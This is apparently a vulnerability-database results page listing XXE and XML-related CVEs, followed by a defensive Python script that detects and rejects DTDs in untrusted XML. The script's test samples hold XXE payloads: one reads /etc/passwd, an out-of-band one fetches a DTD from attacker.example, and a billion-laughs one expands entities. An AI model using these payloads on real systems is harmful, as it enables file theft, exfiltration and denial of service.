
19641 matches found

Github Security Blog | added 2024/06/21 6:31 a.m. | 45 views

ClassGraph XML External Entity Reference

ClassGraph before 4.8.112 was not resistant to XML eXternal Entity (XXE) attacks...

CVSS 7.5 | AI score 6.8 | EPSS 0.00144
Exploits 0 | References 6 | Affected software 1
NVD | added 2024/06/20 1:15 p.m. | 15 views

CVE-2023-49110

When the Kiuwan Local Analyzer uploads the scan results to the Kiuwan SAST web application (either on-premises or the cloud/SaaS solution), the transmitted data consists of a ZIP archive containing several files, some of them in the XML file format. During Kiuwan's server-side processing of these XML...

CVSS 7.2 | EPSS 0.00111
Exploits 1 | References 3
OSV | added 2024/06/15 12:00 a.m. | 12 views

OPENSUSE-SU-2024:10516-1 perl-XML-LibXML-2.0128-1.3 on GA media

These are all security issues fixed in the perl-XML-LibXML-2.0128-1.3 package on the GA media of openSUSE Tumbleweed...

CVSS 5 | AI score 9.5 | EPSS 0.03365
Exploits 0 | References 1
OSV | added 2024/06/15 12:00 a.m. | 9 views

OPENSUSE-SU-2024:11164-1 perl-XML-Twig-3.52-2.8 on GA media

These are all security issues fixed in the perl-XML-Twig-3.52-2.8 package on the GA media of openSUSE Tumbleweed...

CVSS 9.1 | AI score 9.2 | EPSS 0.00433
Exploits 0 | References 1
OSV | added 2024/06/15 12:00 a.m. | 18 views

OPENSUSE-SU-2024:11693-1 xml-security-2.1.7-1.1 on GA media

These are all security issues fixed in the xml-security-2.1.7-1.1 package on the GA media of openSUSE Tumbleweed...

CVSS 7.5 | AI score 6.8 | EPSS 0.00576
Exploits 0 | References 2
NVD | added 2024/06/14 3:15 a.m. | 20 views

CVE-2024-27142

Toshiba printers use XML communication for the API endpoint provided by the printer. For the endpoint, an XML parsing library is used, and it is vulnerable to a time-based blind XML External Entity (XXE) vulnerability. An attacker can DoS the printers. An attacker can exploit the XXE to retrieve...

CVSS 5.9 | EPSS 0.00075
Exploits 1 | References 4
CVE | added 2024/06/14 2:28 a.m. | 75 views

CVE-2024-27142

CVE-2024-27142 affects Toshiba printers' API endpoint that uses an XML parsing library vulnerable to time-based blind XML External Entity (XXE). The vulnerability can lead to Denial of Service and information disclosure. Connected sources (including the NVD/NIST entry) confirm the API/XML handling as...

CVSS 5.9 | AI score 6.1 | EPSS 0.00075
Exploits 1 | References 4
CVE | added 2024/06/14 2:21 a.m. | 92 views

CVE-2024-27141

CVE-2024-27141 affects Toshiba printers' XML API endpoint. The XML parsing library is vulnerable to a time-based blind XML External Entity (XXE) attack, enabling unauthenticated HTTP requests to cause DoS and potentially retrieve information. Connected sources corroborate a multi-vendor vulnerabi...

CVSS 5.9 | AI score 6.1 | EPSS 0.00102
Exploits 1 | References 4
IBM Security Bulletins | added 2024/06/13 10:04 p.m. | 33 views

Security Bulletin: AIX is affected by information disclosure due to Python (CVE-2024-28757)

Summary: A vulnerability in Python could allow a remote attacker to obtain sensitive information (CVE-2024-28757). Python is used by AIX as part of Ansible node management automation. Vulnerability Details: CVEID: CVE-2024-28757. DESCRIPTION: libexpat could allow a remote attacker to obtain sensitive...

CVSS 7.5 | AI score 8.5 | EPSS 0.01195
Exploits 1 | Affected software 2
Github Security Blog | added 2024/06/13 9:31 a.m. | 103 views

Magento Open Source affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that...

CVSS 9.8 | AI score 7.4 | EPSS 0.94171
Exploits 26 | References 9 | Affected software 1
NVD | added 2024/06/13 9:15 a.m. | 80 views

CVE-2024-34102

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that...

CVSS 9.8 | EPSS 0.94171
Exploits 26 | References 3
Tenable Nessus | added 2024/06/13 12:00 a.m. | 31 views

Fedora 39 : php (2024-52c23ef1ec)

The remote Fedora 39 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2024-52c23ef1ec advisory. PHP version 8.2.20 (06 Jun 2024). CGI: Fixed buffer limit on Windows, replacing read call usage by _read (David Carlier). Fixed bug GHSA-3qgc-jrrr-25jv...

CVSS 9.8 | AI score 8.2 | EPSS 0.94374
Exploits 105 | References 7
NVD | added 2024/06/12 11:15 p.m. | 20 views

CVE-2024-4201

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.11.4, and all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HT...

CVSS 4.4 | EPSS 0.01128
Exploits 0 | References 3
UbuntuCve | added 2024/06/12 11:15 p.m. | 15 views

CVE-2024-4201

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.11.4, and all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HT...

CVSS 4.4 | AI score 5.6 | EPSS 0.01128
Exploits 0 | References 4
Vulnrichment | added 2024/06/12 11:01 p.m. | 19 views

CVE-2024-4201 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLab

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.11.4, and all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HT...

CVSS 4.4 | AI score 5.7 | EPSS 0.01128
Exploits 0 | References 3
Cvelist | added 2024/06/12 9:04 p.m. | 19 views

CVE-2024-3467 Deserialization of Untrusted Data in AVEVA PI Asset Framework Client

There is a vulnerability in AVEVA PI Asset Framework Client that could allow malicious code to execute on the PI System Explorer environment under the privileges of an interactive user who was socially engineered into importing XML supplied by an attacker...

CVSS 7 | EPSS 0.00139
Exploits 0 | References 1
Vulnrichment | added 2024/06/12 9:04 p.m. | 15 views

CVE-2024-3467 Deserialization of Untrusted Data in AVEVA PI Asset Framework Client

There is a vulnerability in AVEVA PI Asset Framework Client that could allow malicious code to execute on the PI System Explorer environment under the privileges of an interactive user who was socially engineered into importing XML supplied by an attacker...

CVSS 7 | AI score 7.5 | EPSS 0.00139
Exploits 0 | References 1
Tenable Nessus | added 2024/06/12 12:00 a.m. | 27 views

Fedora 40 : php (2024-49aba7b305)

The remote Fedora 40 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2024-49aba7b305 advisory. PHP version 8.3.8 (06 Jun 2024). CGI: Fixed buffer limit on Windows, replacing read call usage by _read (David Carlier). Fixed bug GHSA-3qgc-jrrr-25jv...

CVSS 9.8 | AI score 8.2 | EPSS 0.94374
Exploits 105 | References 7
Github Security Blog | added 2024/06/07 9:31 p.m. | 25 views

ebookmeta XML External Entity vulnerability

An XML External Entity (XXE) vulnerability in the ebookmeta.getmetadata function of ebookmeta before v1.2.8 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input...

CVSS 7.5 | AI score 6 | EPSS 0.00067
Exploits 0 | References 4 | Affected software 1
Github Security Blog | added 2024/06/07 9:16 p.m. | 8 views

ZendFramework potential XML eXternal Entity injection vectors

Numerous components utilizing PHP's DOMDocument, SimpleXML, and xmlparse functionality are vulnerable to two types of attacks: XML eXternal Entity (XXE) Injection attacks. The above-mentioned extensions are insecure by default, allowing external entities to be specified by adding a specific DOCTY...

AI score 7.4
Exploits 0 | References 3 | Affected software 1
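The ZendFramework entry above describes the common thread in most results on this page: a parser that honours the DOCTYPE lets an attacker declare external entities (in-band XXE, or the blind/out-of-band parameter-entity variant the Toshiba printer entries describe) and internal entities that expand far beyond the input. The example below is added here and is not code from ZendFramework, ebookmeta or any advisory listed; it uses only Python's standard library (expat) and constructed sample documents. It inspects what a DOCTYPE declares without resolving anything, refuses any document that carries one before it reaches a real parser, and shows what the unguarded stdlib parser does with the same input.

```python
"""Inspect untrusted XML for DTD-based attack primitives before parsing it.

Added example (stdlib only); the sample documents at the bottom are
constructed for the demonstration, not taken from any advisory.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class _DtdScanned(Exception):
    """Raised from the EndDoctypeDecl handler so that Parse() returns with the
    report complete; nothing the document body references is handed back."""


def scan_dtd(data: bytes) -> dict:
    """Report what the DOCTYPE declares, without resolving anything.

    external_entities: (name, system id) for every SYSTEM entity, plus the
    external DTD subset itself if the DOCTYPE names one.
    parameter_entities: what blind / out-of-band XXE payloads use.
    internal_entities: what entity-expansion DoS ("billion laughs") uses.
    """
    report = {"doctype": False, "external_entities": [],
              "parameter_entities": [], "internal_entities": []}
    p = expat.ParserCreate()  # default: never fetches external entities or PEs

    def start_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = True
        if sysid:
            report["external_entities"].append(("DOCTYPE " + name, sysid))

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            report["parameter_entities"].append(name)
        if sysid is not None:
            report["external_entities"].append((name, sysid))
        elif not is_param:
            report["internal_entities"].append(name)

    def end_doctype():
        raise _DtdScanned()

    p.StartDoctypeDeclHandler = start_doctype
    p.EntityDeclHandler = entity_decl
    p.EndDoctypeDeclHandler = end_doctype
    try:
        p.Parse(data, True)
    except _DtdScanned:
        pass
    return report


def describe(report: dict) -> str:
    parts = [f"external entity {n} -> {s}" for n, s in report["external_entities"]]
    if report["parameter_entities"]:
        parts.append("parameter entities " + ",".join(report["parameter_entities"]))
    if report["internal_entities"]:
        parts.append(f"{len(report['internal_entities'])} internal entities")
    return "; ".join(parts) or "DOCTYPE present"


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted peer, refusing any DOCTYPE outright.

    Rejecting the DTD wholesale (the policy OWASP recommends and what
    defusedxml's forbid_dtd enforces) removes XXE, external DTD fetches and
    entity-expansion DoS in one check; API messages and uploads have no
    legitimate need for one.
    """
    report = scan_dtd(data)
    if report["doctype"]:
        raise ValueError("DOCTYPE rejected: " + describe(report))
    return ET.fromstring(data)


def rejects(data: bytes) -> bool:
    """True when parse_untrusted refuses the document."""
    try:
        parse_untrusted(data)
    except ValueError:
        return True
    return False


def expanded_text_length(data: bytes) -> int:
    """What the unguarded stdlib parser does with the same input: internal
    entities are expanded, so the output grows well beyond the input size."""
    return len(ET.fromstring(data).text or "")


# Constructed samples.
BENIGN = b'<?xml version="1.0"?><scan><host>10.0.0.5</host></scan>'
# In-band XXE: the parser copies a local file into the element text.
XXE_FILE = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<r>&xxe;</r>')
# Blind / out-of-band variant: a parameter entity pulls an attacker-hosted DTD.
XXE_OOB = (b'<!DOCTYPE r [<!ENTITY % ext SYSTEM "http://attacker.example/x.dtd">'
           b'%ext;]><r/>')
# Entity expansion DoS, limited to 100 expansions here.
LAUGHS = (b'<!DOCTYPE lolz [<!ENTITY lol "lol">'
          b'<!ENTITY lol2 "' + b"&lol;" * 10 + b'">'
          b'<!ENTITY lol3 "' + b"&lol2;" * 10 + b'">]>'
          b'<lolz>&lol3;</lolz>')

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("xxe", XXE_FILE),
                       ("oob", XXE_OOB), ("laughs", LAUGHS)]:
        try:
            print(label, "accepted:", parse_untrusted(doc).tag)
        except ValueError as err:
            print(label, "rejected:", err)
    print("unguarded stdlib expands LAUGHS to", expanded_text_length(LAUGHS), "chars")
```

The scan runs the DTD through expat with its defaults, which never fetch external resources, and stops at the end of the DOCTYPE, so the scanner itself cannot be used as the XXE or expansion vector. When a DOCTYPE genuinely must be allowed, the same report lets you enforce a narrower policy (no external or parameter entities, a cap on internal ones) instead of rejecting outright.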